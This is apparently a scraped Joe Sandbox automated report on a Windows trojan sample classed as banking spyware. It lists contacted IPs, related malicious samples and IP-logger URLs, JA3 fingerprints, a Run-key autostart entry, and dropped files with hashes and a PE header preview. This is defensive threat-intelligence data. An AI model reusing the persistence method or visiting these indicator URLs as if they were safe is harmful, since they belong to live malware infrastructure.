                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              101.36.107.74
                                                                                                              		unknownChina
                                                                                                              		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse
                                                                                                              88.99.66.31
                                                                                                              		unknownGermany
                                                                                                              		24940HETZNER-ASDEfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                              Analysis ID:324174
                                                                                                              Start date:28.11.2020
                                                                                                              Start time:15:04:21
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 14m 46s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Sample file name:KeJ7Cl7flZ.exe
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                              Number of analysed new started processes analysed:27
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • HDC enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.bank.troj.spyw.evad.winEXE@13/35@12/2
                                                                                                              EGA Information:Failed
                                                                                                              HDC Information:
                                                                                                              • Successful, ratio: 18.4% (good quality ratio 17.5%)
                                                                                                              • Quality average: 78.6%
                                                                                                              • Quality standard deviation: 28%
                                                                                                              HCA Information:Failed
                                                                                                              Cookbook Comments:
                                                                                                              • Adjust boot time
                                                                                                              • Enable AMSI
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              Warnings:
                                                                                                              Show All
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 92.122.144.200, 51.104.144.132, 20.54.26.129, 51.103.5.159, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.11.168.160, 104.43.139.144
                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, ris.api.iris.microsoft.com, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Too many dropped files, some of them have not been restored

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              15:05:24API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                              15:07:10API Interceptor1x Sleep call for process: jg2_2qua.exe modified
                                                                                                              15:07:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Host C:\ProgramData\Windows Host\Windows Host.exe

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              88.99.66.31cli.exeGet hashmaliciousBrowse
                                                                                                              • ezstat.ru/1BiQt7.html
                                                                                                              R7w74RKW9A.exeGet hashmaliciousBrowse
                                                                                                              • ezstat.ru/1BiQt7.html
                                                                                                              pqSZtQiuRy.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/14mvt7.gz
                                                                                                              3MndTUzGQn.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/14qK87
                                                                                                              fEBNeNkRYI.docGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1cyy87.jpg
                                                                                                              Delivery-77426522.docGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1cyy87.jpg
                                                                                                              mesager43.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1cyy87.jpg
                                                                                                              hci0xn0zip.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1cyy87.jpg
                                                                                                              DOC001.exeGet hashmaliciousBrowse
                                                                                                              • 2no.co/1Lan77
                                                                                                              DOC001 (3).exeGet hashmaliciousBrowse
                                                                                                              • 2no.co/1Lan77
                                                                                                              urgently.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1Uu547.tgz
                                                                                                              SecuriteInfo.com.Generic.mg.e26982b170856ca8.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1Uu547.tgz
                                                                                                              trwf3446.docGet hashmaliciousBrowse
                                                                                                              • iplogger.org/1Uu547.tgz
                                                                                                              2020_1549496734.docGet hashmaliciousBrowse
                                                                                                              • maper.info/XtDei
                                                                                                              2020_1549496734.docGet hashmaliciousBrowse
                                                                                                              • maper.info/XtDei
                                                                                                              http://maper.infoGet hashmaliciousBrowse
                                                                                                              • maper.info/
                                                                                                              clipp.exeGet hashmaliciousBrowse
                                                                                                              • iplogger.com/1NAnw7
                                                                                                              por.exeGet hashmaliciousBrowse
                                                                                                              • ezstat.ru/1kDj27
                                                                                                              morfer.exeGet hashmaliciousBrowse
                                                                                                              • iplo.ru/1VJfB6.jpeg
                                                                                                              image2017-11-22-5864621.vbsGet hashmaliciousBrowse
                                                                                                              • iplogger.co/18RtV6.jpg

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              iplogger.orgXC65ED9or6.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              cli.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              R7w74RKW9A.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              pqSZtQiuRy.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              a3d224d6da883da2d8ba5671ab64ed24.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              a3d224d6da883da2d8ba5671ab64ed24.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              SecuriteInfo.com.ArtemisE8B534F89B0F.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              SecuriteInfo.com.Trojan.PWS.Siggen2.59718.4609.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              SecuriteInfo.com.Trojan.PWS.Siggen2.59485.31175.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              2rYTU7Mzo9.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              3MndTUzGQn.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              fEBNeNkRYI.docGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              Delivery-77426522.docGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              mesager43.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              hci0xn0zip.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              mAGgYcXJQt.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              mAGgYcXJQt.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              BfzImZE7zo.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              ub3hVgo06u.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              taEYMQQA1C.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              ip-api.comySlUZAKoMh.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              si7zDzLSfK.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              82XVDE9IWo.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              jFqDHL8zPX.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              XC65ED9or6.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              4jb976XCme.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              4aU4qrHzwx.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              2scEWJGJIQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              R0BsJKRSF4.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Venom.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              PO348578.jarGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              module.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              Payment Swift.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              WYkWMLlPvb.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              WYkWMLlPvb.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              SecuriteInfo.com.Trojan.GenericKDZ.71528.23323.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                                                              • 193.234.225.88
                                                                                                              TOOL.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              pmL5ihWLvh.exeGet hashmaliciousBrowse
                                                                                                              • 208.95.112.1
                                                                                                              trueaerned.comySlUZAKoMh.exeGet hashmaliciousBrowse
                                                                                                              • 198.98.57.54
                                                                                                              si7zDzLSfK.exeGet hashmaliciousBrowse
                                                                                                              • 198.98.57.54
                                                                                                              4jb976XCme.exeGet hashmaliciousBrowse
                                                                                                              • 198.98.57.54

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              UHGL-AS-APUCloudHKHoldingsGroupLimitedHKAdditional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                              • 101.36.113.249
                                                                                                              Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                              • 101.36.113.249
                                                                                                              DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                                                                                              • 101.36.113.249
                                                                                                              NP9K0ul0jfgmTjl.exeGet hashmaliciousBrowse
                                                                                                              • 101.36.120.233
                                                                                                              Quotation.exeGet hashmaliciousBrowse
                                                                                                              • 103.72.146.121
                                                                                                              Detalii 032411-959286.docGet hashmaliciousBrowse
                                                                                                              • 128.14.231.58
                                                                                                              Detalii 032411-959286.docGet hashmaliciousBrowse
                                                                                                              • 128.14.231.58
                                                                                                              Detalii 032411-959286.docGet hashmaliciousBrowse
                                                                                                              • 128.14.231.58
                                                                                                              http://phpyb.com/gmhtg/TZ/2Q/zNzgLzGa.zipGet hashmaliciousBrowse
                                                                                                              • 152.32.211.197
                                                                                                              HETZNER-ASDEdocument-1475334804.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              XC65ED9or6.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1475334804.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1471350090.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1471350090.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              XcOxlmOz4D.exeGet hashmaliciousBrowse
                                                                                                              • 95.217.228.176
                                                                                                              document-1482143404.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1482143404.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-15241477.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-15241477.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1528549920.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1528549920.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1523563474.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1523563474.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              TaskAudio Driver.exeGet hashmaliciousBrowse
                                                                                                              • 95.217.144.93
                                                                                                              document-1544626742.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1544626742.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1544163851.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              document-1544163851.xlsGet hashmaliciousBrowse
                                                                                                              • 78.46.235.88
                                                                                                              coinomi-1.20.0.apkGet hashmaliciousBrowse
                                                                                                              • 88.99.26.209

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              ce5f3254611a8c095a3d821d44539877XC65ED9or6.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              DHL invoice VNYI564714692.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              Order-Poland.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              Novi poredak.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              Customer Remittance Advice 9876627262822662.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              94039330.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              P1001094.EXEGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              New Order PO20011046.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              11-27.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              caw.exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              6znqz0d1.dllGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              INV-FATURA010009.xlsxGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              2zv940v7.dllGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              Izezma64.dllGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              fuxenm32.dllGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              api-cdef.dllGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              37f463bf4616ecd445d4a1937da06e19document-1456864371.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1365485901.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1363274030.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              SecuriteInfo.com.Exploit.Siggen3.2597.23127.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1460962286.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1366355469.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1458916175.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1463039695.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1499051934.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1367992196.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1511069982.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1475334804.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1459095245.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1366980661.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1471350090.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1500752222.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1506903149.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              http://culturenempathy.org/Get hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              case.8920.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1497815773.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):490274830
                                                                                                              Entropy (8bit):0.13399746942054178
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:
                                                                                                              MD5:C4E00A325E324C12C52D45A2C5A0B7CA
                                                                                                              SHA1:F457B527850FB82A942A33DE7195356BA76F3C89
                                                                                                              SHA-256:A958A1908B2473BD3A7547122602ADF7FFAFC17D94B52E95CD99836CD1E6CE96
                                                                                                              SHA-512:301DC8DD9D61D90157D989CCC0F3D6897EC18EA6A6F3665D6647E6848C11C39D6A01D624914399CE5FAFA2914BEBAE830FB0C29D5B2A0C3BFD5D14693677F042
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@..................................................3.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........@.......c....... ....@...........................................@.......@.....................<...T.......P........................................................................... ..@............................text............................... ....rdata..\.... ......................@..@.data............h..................@....rsrc...P............H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_002.exe_1c529646ab3c8a1fdb7fc485aa1d9d3291c12_6234ae00_0086ee01\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12056
                                                                                                              Entropy (8bit):3.7759983087181124
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:yIqpHMfd/UUT+njbttz/u7sUS274ItiRX:5qZMf1UUqjH/u7sUX4ItSX
                                                                                                              MD5:99CA516681EAE4643633DEDF3DA3D372
                                                                                                              SHA1:FF67FCADDA5993CFAA69296AEFCF155893C279EB
                                                                                                              SHA-256:3045F06E40C928526C531FEF56D0EF172C7B45CDAC87D59A81073D4F10A2CE9E
                                                                                                              SHA-512:54AB45588862D5AAF79B609EA8F52430926F354C530BB1166383861F0FE0C3235548351A1DFD270C6A24822B5DEEB543FF85B4DCB54FA35B44E1F051514ED679
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.0.7.8.3.1.9.1.0.5.4.3.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.0.7.8.3.2.2.9.6.4.8.1.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.8.9.b.b.7.e.-.d.a.f.3.-.4.7.5.b.-.8.e.9.b.-.c.1.7.a.d.5.1.7.6.5.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.7.6.4.9.6.8.-.a.2.a.9.-.4.d.7.d.-.9.d.3.1.-.d.9.6.2.1.9.8.3.7.4.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.0.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.2.0.2.0.1.1.0.9._.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.0.-.0.0.0.1.-.0.0.1.6.-.8.8.a.1.-.f.e.e.e.d.a.c.5.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.c.d.a.b.d.2.7.f.6.c.7.d.f.b.c.5.a.d.8.6.2.c.4.0.2.7.a.3.0.d.0.0.0.0.0.4.0.8.!.0.0.0.0.f.e.d.b.7.6.0.f.6.7.f.6.0.0.0.b.f.3.1.1.c.7.6.d.f.f.5.5.c.3.5.b.e.e.d.a.8.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_002.exe_566a661da143f3fc1b192bf169fbb3659a52956_6234ae00_00871c35\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12048
                                                                                                              Entropy (8bit):3.772567716869348
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:pwQfqJ3HbcjA+njbttz/u7sUS274ItiRs:jqJbcjVjH/u7sUX4ItSs
                                                                                                              MD5:DE39AECB7DE27D5C6CCFEDEB1BFC6A10
                                                                                                              SHA1:BED09940E0337BC7FE6E839750A76EAFCB260CC8
                                                                                                              SHA-256:98D49983ADF4C7542B44BEDA4D3779862CDB4BF97D390EEF314C2673016DF157
                                                                                                              SHA-512:B48EC3BE49299FD5199199AC3392DE7888CA74C0EA5FAC0C5D172D0C1A63C8E99365453A8D762595662C558A134A7A7D97151FA69680BA698264E9AF0C0859BE
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.0.5.4.2.9.2.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.5.0.4.2.9.2.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.b.0.7.c.d.3.-.a.2.9.6.-.4.d.8.c.-.b.6.c.f.-.b.5.c.a.8.7.8.8.6.e.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.f.d.e.8.3.6.-.f.e.f.2.-.4.5.f.7.-.8.2.3.0.-.d.6.e.4.3.a.d.b.e.c.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.0.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.2.0.2.0.1.1.0.9._.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.0.-.0.0.0.1.-.0.0.1.6.-.8.8.a.1.-.f.e.e.e.d.a.c.5.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.c.d.a.b.d.2.7.f.6.c.7.d.f.b.c.5.a.d.8.6.2.c.4.0.2.7.a.3.0.d.0.0.0.0.0.4.0.8.!.0.0.0.0.f.e.d.b.7.6.0.f.6.7.f.6.0.0.0.b.f.3.1.1.c.7.6.d.f.f.5.5.c.3.5.b.e.e.d.a.8.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER439.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:31 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):62728
                                                                                                              Entropy (8bit):1.8912382117232474
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:5llPvcmIwARaNqcYmN5x3qjlGtadY/xIKV/pkHa7ILDz9rGEUi1Tx7:lvcsAkg0N5x6GoW/x7Bq/kSX
                                                                                                              MD5:72AFCDBE07E222E0A9B13E1C9FC83751
                                                                                                              SHA1:0195A8A0CBB567E43903653126F7F16104D955B4
                                                                                                              SHA-256:F37A52664590A33123433479536BF9FA30DC9A5AD6A38B5BD8D188DD682BF356
                                                                                                              SHA-512:7D60C593C601FD6309714F70B467DCB08D91BA90F62F366BB4F8E8B7D232B2019F35AEF56015E7336855DBFD4513EA0321F047FCD6411986D948226EBF2B27B4
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA45.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.703844921832443
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNir66p6YC369gmfjSBCpDK89bN/sfEvm:RrlsNim6p6Y669gmfjSCNkfh
                                                                                                              MD5:5E1680D58C9310366B58FA0BECDE2CDE
                                                                                                              SHA1:E1A2403D1DA40605DC82418454C57961B5534B1E
                                                                                                              SHA-256:A736E83BA14E746424058B6CDB09DAE60E5F207757AE6E35ADDD170736F1B50A
                                                                                                              SHA-512:8CDE417E7F9220421F3A7B42464A240171D0D42647151B6B243C0F509CEBD7B8B78610F14F8B331FCE4751E94462BFD7C86261BC990AA96DC36C227415AC767A
                                                                                                              Malicious:false
